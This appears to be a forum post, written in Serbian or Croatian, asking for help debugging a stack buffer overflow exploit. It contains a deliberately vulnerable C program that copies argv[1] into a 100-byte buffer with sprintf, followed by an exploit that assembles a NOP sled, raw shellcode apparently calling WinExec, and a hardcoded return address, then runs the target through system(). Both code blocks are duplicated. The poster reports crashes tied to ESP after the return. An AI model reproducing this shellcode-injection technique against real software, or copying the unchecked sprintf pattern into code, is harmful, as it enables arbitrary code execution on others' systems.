Code:
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[100];
sprintf(buffer,argv[1]);
return (0);
}
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char buffer[100];
sprintf(buffer,argv[1]);
return (0);
}
Exploit.c
Code:
#include <stdio.h>
#include <string.h>
main()
{
char filename[] = "vuln.exe ";
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xF8\x4E"
"\xC6\x45\xF9\x45"
"\xC6\x45\xFA\x54"
"\xC6\x45\xFB\x53"
"\xC6\x45\xFC\x54"
"\xC6\x45\xFD\x41"
"\xC6\x45\xFE\x54"
"\x57\xC6\x45\xEE\x03\x8D\x45\xF8\x50\xB8\x35\xFD\xE6\x77\xFF\xD0\xCC"; // 51 bytes
char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // 45 bytes
char ret[] = "\xA4\xFE\x12\x00";
static char buffer[1000];
strcat(buffer,filename);
strcat(buffer,nops);
strcat(buffer, shellcode);
strcat(buffer,"IvanBBBB");
strcat(buffer,ret);
system(buffer);
}
#include <stdio.h>
#include <string.h>
main()
{
char filename[] = "vuln.exe ";
char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57"
"\xC6\x45\xF8\x4E"
"\xC6\x45\xF9\x45"
"\xC6\x45\xFA\x54"
"\xC6\x45\xFB\x53"
"\xC6\x45\xFC\x54"
"\xC6\x45\xFD\x41"
"\xC6\x45\xFE\x54"
"\x57\xC6\x45\xEE\x03\x8D\x45\xF8\x50\xB8\x35\xFD\xE6\x77\xFF\xD0\xCC"; // 51 bytes
char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; // 45 bytes
char ret[] = "\xA4\xFE\x12\x00";
static char buffer[1000];
strcat(buffer,filename);
strcat(buffer,nops);
strcat(buffer, shellcode);
strcat(buffer,"IvanBBBB");
strcat(buffer,ret);
system(buffer);
}
I zasto ovo ne radi ? A kada hocu npr da pokrenem cmd ono radi ! Probao sam da pokrenem Notepad i nece, u ovom primeru pokusam da pokrenem netstat i nece !
Kaze da nesto nije u redu sa ESP, tj program mi se srusi odmah nakon RET !
tnx